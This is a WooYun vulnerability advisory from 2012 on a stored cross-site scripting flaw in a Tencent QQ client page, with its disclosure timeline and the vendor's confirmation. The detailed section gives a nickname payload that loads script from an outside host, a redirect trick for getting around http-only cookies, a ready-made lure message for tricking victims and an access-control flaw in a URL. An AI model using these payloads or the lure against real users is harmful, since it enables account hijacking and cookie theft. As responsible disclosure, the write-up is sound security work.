当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013563

漏洞标题:PKAV腾讯专场 - 3. 腾讯QQ客户端某处功能页面存储型XSS

相关厂商:腾讯

漏洞作者: only_guest

提交时间:2012-10-19 12:10

修复时间:2012-12-03 12:11

公开时间:2012-12-03 12:11

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-19: 细节已通知厂商并且等待厂商处理中
2012-10-19: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向核心白帽子及相关领域专家公开
2012-11-08: 细节向普通白帽子公开
2012-11-18: 细节向实习白帽子公开
2012-12-03: 细节向公众公开

简要描述:

QQ客户端某处页面没过滤好,导致可被利用XSS。漏洞相关信息,会同步至pkav.net。

详细说明:

QQ里很多地方都是嵌入的网页,所以我们对这些嵌入的网页系统的进行了分析。
而后,发现在手机生活这个功能页面中,昵称处未过滤,从而导致XSS。
1. 漏洞页面,个人资料,手机生活页面。
2. QQ用户昵称有一定的长度限制。为了在某种程度上绕过这种限制,我们利用之前在某漏洞中已经使用过的技巧,从webQQ来修改用户的昵称,将昵称修改为:<script src=//xsser.me/xxxxx> 即可。(因为昵称后方有 </script>闭合,因此利用代码无需加</script>)


3. 可以看到当用户打开页面,页面执行了我们指定的JS文件。


页面内的昵称没有被过滤


4. 用自己大号访问小号的个人资料--手机生活页面时。触发XSS,导致信息被记录。


弹个窗


5. 此次发布漏洞时,小号可成功利用登录信息来登录大号。 但是在之前测试时,发现此页面的cookie加了http-only,不知道现在为何又没了?挺奇怪。


6. 不过即使是之前加了http-only的情况,我们依然可以通过跳转到腾讯旗下任意一个反射型XSS,来间接获取到用户的cookies信息。

if(location.href.indexOf("m.qq.com")>-1){ location.href="反射型XSS地址"; }


7. 至于漏洞利用方法。
A. 诱使用户访问你的个人资料-手机生活页面。 至于怎么骗,看各人自己口才了,比如我会说:“hey, 帮我看看我的手机生活页面,为什么我能看到别人的,看不到我自己的啊,你那边能看到吗?我这边显示一片空白。。不知道是不是我网络问题啊。”
B. http://m.qq.com/client/cguest?frienduin=10001 这个页面本身没有做好有判定,因此任何人都可以访问到任何人的手机生活页面。比如上面是pony的手机生活页面。因而,http://m.qq.com/client/cguest?frienduin=带有XSS的QQ号码, 这个页面将可以直接用来作为XSS页面发送给受害者。

漏洞证明:

见详细说明

修复方案:

昵称输出过滤

版权声明:转载请注明来源 only_guest@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-10-19 16:00

厂商回复:

非常感谢您的报告。我们会马上安排专人跟进确认处理,有新的情况会及时同步

最新状态:

暂无